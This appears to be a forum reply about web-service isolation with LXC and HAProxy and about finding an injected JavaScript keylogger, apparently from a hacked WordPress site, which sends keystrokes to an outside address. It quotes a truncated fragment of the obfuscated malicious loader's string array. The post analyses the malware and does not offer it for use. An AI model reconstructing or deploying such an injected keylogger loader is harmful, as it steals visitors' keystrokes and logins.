Yeah. This is one reason - amongst several others - that I use LXC to seperate each and every webservices. In truth, then my HAProxy instance runs fast-cgi to anything BUT nextcloud, so only my NC container has the overhead of an additional webserver. The other webservices are not mission critical, and holds very little important data. However if I had used NGINX as reverse proxy instead of HAProxy, I bet I could have spared the apache2. But the extra overhead is worth it for added security in terms of segregation, so I am not sure I would have chosen that anyway.
Anyways. I ran the js it points to, through JS Deobfuscator - Unobfuscator - Online Javascript to Native Decoder
It is a keylogger that sends the key presses async to an external address. I will not post it here, but you can follow it in a private window, copy the text on the screen, and run it through the above online unobfuscator. You will see that it is a JS based keylogger.
However this piece tells me it was a wordpress hack:
function _0x320b() {
var unimplementedMethods = ["396114UBrarG", "getTime", "src", "5yjhmnQ", "542101ElmiFa", "wpcurrentadmin", "172743ORXpEk", "7091MiccWl", "738659VtOMud", "toUTCString", "insertBefore", "; expires=", "985563xDOOsM", "appendChild", "script", "7SpDjJV", "16608290NQmGyT", "split", "24GZSqIV", "1298788QqNMJn", "52ZioigQ", "318KWQXzl", "push", "length", "head", "wp-settings", "248960kBdeJg", "8991730kougUB", "12CLXHWv", "shift",
“wpcurrentadmin”
“wp-settings”